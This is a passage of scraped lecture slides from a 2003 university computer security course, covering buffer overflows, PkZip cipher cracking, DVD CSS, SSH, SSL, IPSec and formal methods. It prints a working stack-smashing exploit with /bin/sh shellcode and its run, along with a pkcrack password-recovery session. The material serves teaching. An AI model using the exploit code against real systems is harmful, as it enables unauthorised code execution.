![Page 482: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/482.jpg)
Simple Program
When we run it:
[hugh@pnp176-44 programs]$ ./vulnerable testArgument is test[hugh@pnp176-44 programs]$ ./vulnerable “A Longer Test”Argument is A Longer Test[hugh@pnp176-44 programs]$
CS3235 - Hugh Anderson’s notes. Page number: 481
![Page 483: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/483.jpg)
Simple program
Stack
Stack grows down...
Return address
Buffer (512 bytes)
Computer’s Memory
ArgumentsVariables
CS3235 - Hugh Anderson’s notes. Page number: 482
![Page 484: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/484.jpg)
Smashing the stack!
Stack
Stack grows down...
Return address
Computer’s Memory
ArgumentsVariables
CS3235 - Hugh Anderson’s notes. Page number: 483
![Page 485: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/485.jpg)
Working and not working!
[hugh@pnp176-44 programs]$ ./vulnerable ddddd
CS3235 - Hugh Anderson’s notes. Page number: 484
![Page 486: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/486.jpg)
Exploit...
#include <stdlib.h> #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define NOP 0x90 char shellcode[] = " \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" " \x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" " \x80\xe8\xdc\xff\xff\xff/bin/sh"; unsigned long get_sp ( void) __asm__ (" movl %esp,%eax"); void main ( int argc, char *argv[]) char *buff, *ptr; long *addr_ptr, addr; int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE; int i; if (argc > 1) bsize = atoi (argv[1]); if (argc > 2) offset = atoi (argv[2]); if (!(buff = malloc (bsize))) printf (" Can’t allocate memory.\n"); exit (0); addr = get_sp () − offset; printf (" Using address: 0x%x\n", addr); ptr = buff; addr_ptr = ( long *) ptr; for (i = 0; i < bsize; i += 4) *(addr_ptr++) = addr; for (i = 0; i < bsize / 2; i++) buff[i] = NOP; ptr = buff + ((bsize / 2) − (strlen (shellcode) / 2)); for (i = 0; i < strlen (shellcode); i++) *(ptr++) = shellcode[i]; buff[bsize − 1] = ’ \0’; memcpy (buff, " EGG=", 4); putenv (buff); system (" /bin/bash");
CODE LISTING exploit3.cCODE LISTING exploit3.c
CS3235 - Hugh Anderson’s notes. Page number: 485
![Page 487: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/487.jpg)
Exploit
[hugh@pnp176-44 programs]$ ./exploit3 560Using address: 0xbfffe998[hugh@pnp176-44 programs]$ ./vulnerable $EGGArgument is ????????...???????sh-2.05b$
We are now within the vulnerable program process, but run-ning the sh shell program, instead of the vulnerable pro-gram.
CS3235 - Hugh Anderson’s notes. Page number: 486
![Page 488: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/488.jpg)
Using the buffer overflow attack
A server (say a web server) that expects a query, andreturns a response.
A CGI/ASP or perl script inside a web server
A SUID root program on a UNIX system
CS3235 - Hugh Anderson’s notes. Page number: 487
![Page 489: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/489.jpg)
Example attack - Blaster
Recently we have been having a series of attacks on Mi-crosoft systems that are based on various buffer overflowproblems.
The Blaster worm is described in the CERT advisory“CA-2003-20 W32/Blaster worm”:
The W32/Blaster worm exploits a vulnerability inMicrosoft’s DCOM RPC interface as described inVU#568148 and CA-2003-16. Upon successful exe-cution....
CS3235 - Hugh Anderson’s notes. Page number: 488
![Page 490: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/490.jpg)
Example attack CRC-32 on ssh
http://razor.bindview.com/publish/advisories/adv ssh1crc.html
CS3235 - Hugh Anderson’s notes. Page number: 489
![Page 491: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/491.jpg)
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 490
![Page 492: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/492.jpg)
PkZip stream cipher
PkZip is for compressing files
PkZip can also scramble files when given a secret pass-word.
Enciphering strategy is weak and can be cracked
http://citeseer.nj.nec.com/122586.html
Weakness in the (homegrown) ciphering algorithm
CS3235 - Hugh Anderson’s notes. Page number: 491
![Page 493: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/493.jpg)
PkZip stream cipher
opo 144% pkcrack -C all.zip -c readme.doc -P plain.zip -p readme.docFiles read. Starting stage 1 on Wed Sep 8 09:04:02 1999Generating 1st generation of possible key2 421 values...done.Found 4194304 possible key2-values.Now we’re trying to reduce these...Done. Left with 18637 possible Values. bestOffset is 24.Stage 1 completed. Starting stage 2 on Thu Sep 9 09:12:06 1999Ta-daaaaa! key0=dda9e469, key1=96212999, key2=f9fc9651Probabilistic test succeeded for 402 bytes.Stage2 completed. Starting pass-word search on Thu Sep 9 09:22:22 1999Key: 73 65 63 72 65 74Or as a string: ’secret’ (without the enclosing single quotes)Finished on Thu Sep 9 10:54:22 1999 opo 99%opo 145% ./zipdecrypt dda9e469 96212999 f9fc9651 all.zip rr.zipopo 146%
rr.zip contains unencypted version of archive
CS3235 - Hugh Anderson’s notes. Page number: 492
![Page 494: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/494.jpg)
PkZip stream cipher fix
The PkZip stream cipher is also susceptible to dictionaryattacks, and so it is considered not suitable for secure en-cryption of data. The fix is:
Don’t use PkZip for security purposes.
CS3235 - Hugh Anderson’s notes. Page number: 493
![Page 495: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/495.jpg)
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 494
![Page 496: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/496.jpg)
DVD security
Content Scrambling System - data encryption scheme
Developed by commercial interests to stop copying... but
Easy to copy a DVD, but CSS prevents decrypting,changing and re-recording.
Details are trade secret.
Master set of 400 keys is stored on every DVD, and theDVD player uses these to generate a key needed to de-crypt data from the disc.
CS3235 - Hugh Anderson’s notes. Page number: 495
![Page 497: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/497.jpg)
DVD security
Linux users were excluded from access to CSS licensesbecause of the open-source nature of Linux.
In October 1999, hobbyists/hackers in Europe crackedthe CSS algorithm
DVD industry players have been trying to prevent distri-bution of any software
The source code for decoding DVD is available on a T-shirt.
CS3235 - Hugh Anderson’s notes. Page number: 496
![Page 498: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/498.jpg)
DVD security
The lesson to learn from this is that once-againsecurity-through-obscurity is a very poor strategy.
The source code and detailed descriptions for a CSS de-scrambler is available at:
http://www-2.cs.cmu.edu/˜dst/DeCSS/Gallery/
CS3235 - Hugh Anderson’s notes. Page number: 497
![Page 499: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/499.jpg)
DVD security
Description of the key/descrambling process:
First one must have a master key, which is unique tothe DVD player manufacturer. It is also known as aplayer key. The player reads an encrypted disk keyfrom the DVD, and uses its player key to decrypt thedisk key. Then the player reads the encrypted title keyfor the file to be played. (The DVD will likely containmultiple files, typically 4 to 8, each with its own titlekey.) It uses the decrypted disk key (DK) to decryptthe title key. Finally, the decrypted title key, TK, is usedto descramble the actual content.
CS3235 - Hugh Anderson’s notes. Page number: 498
![Page 500: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/500.jpg)
DVD security
Confusion and diffusion...
#define m(i)(x[i]^s[i+84])< <unsigned char x[5],y,s[2048];main(n)for(read(0,x,5);read(0,s,n=2048);write(1,s ,n))if(s[y=s[13]%8+20]/16%4==1)int i=m(1)17^256+m(0)8,k=m(2)0,j=m(4)17^m(3)9^k *2-k%8^8,a=0,c=26;for(s[y]-=16;--c;j*=2)a=a*2^i&1,i=i/2^j&1< <24;for(j=127;++j<n ;c=c>y)c+=y=i^i/8^i> >4^i> >12,i=i> >8^y< <17,a^=a> >14,y=a^a*8^a< <6,a=a> >8^y< <9,k=s [j],k="7Wo~’G \216"[k&7]+2^"cr3sfw6v;*k+>/n."[k> >4]*2^k*257/8,s[j]=k^(k&k*2&34) *6^c+~y;
CS3235 - Hugh Anderson’s notes. Page number: 499
![Page 501: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/501.jpg)
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 500
![Page 502: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/502.jpg)
ssh
For logging in a remote machine
Has secure encrypted communications, and...
You can’t snoop or sniff passwords.
TCP/IP connections can be forwarded over the securechannel.
CS3235 - Hugh Anderson’s notes. Page number: 501
![Page 503: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/503.jpg)
ssh - proving identity
1. /etc/hosts.equiv: same user name? OK - log in!I
2. ~/.rhosts: by user? OK - log in!
3. RSA: authentication using public-key cryptography.
4. TIS: trusted server to authenticate the user.
5. Passwords: password sent encrypted...
CS3235 - Hugh Anderson’s notes. Page number: 502
![Page 504: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/504.jpg)
RSA key management
The file ~/.ssh/authorized keys lists the public keys for log-ging in.
• Initially: ssh program tells the server which key pair itwould like to use
• Challenge: server sends challenge encrypted with pub-lic key.
• Decrypt: client decrypts using private key. The chal-lenge returned as proof
CS3235 - Hugh Anderson’s notes. Page number: 503
![Page 505: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/505.jpg)
Port forwarding
Secure shell supports TCP/IP port forwarding
For example - if we wanted to use a secure channel toour X display on the local machine, the proxy listens forconnections on a port, forwards the connection requestand any data over the secure channel, and makes a con-nection to the real X display from the SSH Terminal.
CS3235 - Hugh Anderson’s notes. Page number: 504
![Page 506: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/506.jpg)
Secure Sockets Layer (SSL)
Netscape has protocol for data security - uses 128-bitkeys.
data encryption, server authentication, message integrity, and optional client authentication
SSL is an open, nonproprietary protocol
CS3235 - Hugh Anderson’s notes. Page number: 505
![Page 507: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/507.jpg)
UN-SSL
Netscape weakly seeds a random number generator
Someone who can snoop the network and has access toan account can discover seed
Expected search space similar to brute-forcing a 40-bitkey
CS3235 - Hugh Anderson’s notes. Page number: 506
![Page 508: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/508.jpg)
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 507
![Page 509: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/509.jpg)
PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 508
![Page 510: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/510.jpg)
PGPfone
Speech compression and strong cryptography
Available in two versions:
1. An international version available outside America,and a prohibited import into America.
2. An American version available inside America, and aprohibited import out of America.
These two versions are also exactly the same! Restrictionson the import and export of munitions - strong cryptographyis considered a munition.
CS3235 - Hugh Anderson’s notes. Page number: 509
![Page 511: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/511.jpg)
PGPfone
Familiar encryption and key exchange parameters:
When initially setting up a link, Diffie-Hellman key exchangeis used to ensure safety in the choice of an encryption key.
CS3235 - Hugh Anderson’s notes. Page number: 510
![Page 512: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/512.jpg)
Chapter 11
Lecture 11 - Security
CS3235 - Hugh Anderson’s notes. Page number: 511
![Page 513: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/513.jpg)
Last session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 512
![Page 514: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/514.jpg)
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 513
![Page 515: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/515.jpg)
Design principles
Paper by Saltzer and Schroeder, summarized below:
• Economy of mechanism: Keep the design as simpleand small as possible. (identd assumption)
• Fail-safe defaults: Base access decisions on permis-sion rather than exclusion. This is conservative design.(mail server - mail only access)
• Complete mediation: Every access to every objectmust be checked for authority. (DNS cache poisoning)
CS3235 - Hugh Anderson’s notes. Page number: 514
![Page 516: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/516.jpg)
Design principles
• Open design: The design should not be secret. (DVDs,Microsoft SAM hashes...)
• Separation of privilege: Two keys are better than one.No single event can compromise the system. (su - pass-word and wheel group)
• Least privilege: Every program and every user of thesystem should operate using the least set of privilegesnecessary to complete the job. (Military need-to-know)
CS3235 - Hugh Anderson’s notes. Page number: 515
![Page 517: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/517.jpg)
Design principles
• Least common mechanism: Minimize the amount ofmechanism common to more than one user and de-pended on by all users. (supervisor or library).
• Psychological acceptability: Human interface easy touse.
In the textbook there are examples of the use of each ofthese design principles.
CS3235 - Hugh Anderson’s notes. Page number: 516
![Page 518: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/518.jpg)
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 517
![Page 519: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/519.jpg)
Biometrics
Biometrics is the use of human physical characteristics tosupport authentication .
CS3235 - Hugh Anderson’s notes. Page number: 518
![Page 520: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/520.jpg)
Biometrics - eyes
CS3235 - Hugh Anderson’s notes. Page number: 519
![Page 521: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/521.jpg)
Minimal hardware biometrics
Voices - Record and process voice leading to eitherspeaker verification or recognition.
Faces - Capture either a static or moving image of a face.
Keystrokes - capture a sequence of keystrokes, record-ing timing.
Combinations of characteristics may be used, but in generalbiometric techniques are not reliable on their own. Goodsecond key for separation of privilege .
CS3235 - Hugh Anderson’s notes. Page number: 520
![Page 522: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/522.jpg)
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 521
![Page 523: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/523.jpg)
IPSec
IPSec is a set of standards intended to support com-munication security between networked computers, par-ticularly in the newer IPv6 (IP Next-Generation) network.
IPSec software is available in Windows2000, Linux, andon routers on the Internet.
http://www.faqs.org/rfcs/rfc2401.html
IPSec may be used in a range of ways.
CS3235 - Hugh Anderson’s notes. Page number: 522
![Page 524: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/524.jpg)
IPSec VPN
ISP
CS3235 - Hugh Anderson’s notes. Page number: 523
![Page 525: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/525.jpg)
IPSec point-to-point
CS3235 - Hugh Anderson’s notes. Page number: 524
![Page 526: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/526.jpg)
IPSec network-to-network
CS3235 - Hugh Anderson’s notes. Page number: 525
![Page 527: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/527.jpg)
IPSec headers
There are two types of header, one used for authentica-tion , and the other used for encryption :
1. AH - the Authentication Header for data integrity, anti-replay and authentication
2. ESP - the Encapsulating Security Payload header, forconfidentiality. ESP can also provide AH services.
Communicating parties agree on a Security Association(SA), one SA for each direction, and one SA for each typeof communication.
CS3235 - Hugh Anderson’s notes. Page number: 526
![Page 528: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/528.jpg)
Modes of operation
• An end-to-end SA - Transport mode
IPv6 hdr
OriginalIPv6 hdr
AHOriginal
ESP
Transport segment
Transport segment ESP
authenticated
encrypted
authenticated
CS3235 - Hugh Anderson’s notes. Page number: 527
![Page 529: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/529.jpg)
Modes of operation
• An SA between security gateways - Tunnel mode
IPv6 hdr
IPv6 hdr
AH
ESP
authenticated
encrypted
authenticated
New
New
IPv6 hdrOriginal
OriginalIPv6 hdr
Transport segment
Transport segment ESP
SAs form a kind of distributed database.
CS3235 - Hugh Anderson’s notes. Page number: 528
![Page 530: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/530.jpg)
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
CS3235 - Hugh Anderson’s notes. Page number: 529
![Page 531: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/531.jpg)
Formal methods
FM encompasses a wide range of techniques...
Model checking:
constructing formal models , with appropriate formal specifications .
Example is Promela and Spin .
CS3235 - Hugh Anderson’s notes. Page number: 530
![Page 532: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/532.jpg)
Promela and spin
The language Promela is ’C’ like, with an initializationprocedure. It can model asynchronous or synchronous,deterministic or non-deterministic systems
Spin is the checker for Promela models
Assertions to test correctness of model:
assert(some boolean condition);
If condition not TRUE then assertion violated.
CS3235 - Hugh Anderson’s notes. Page number: 531
![Page 533: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/533.jpg)
Temporal claims
We got here again without making any progress!
The support for temporal claims takes the form of:
Endstate labels - for determining valid endstates Progress labels - claim no non-progress cycles Never claims - impossible temporal assertions
CS3235 - Hugh Anderson’s notes. Page number: 532
![Page 534: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/534.jpg)
Simple example
Bin
BA
Bout
BtoA
AtoB
Ain Aout
CS3235 - Hugh Anderson’s notes. Page number: 533
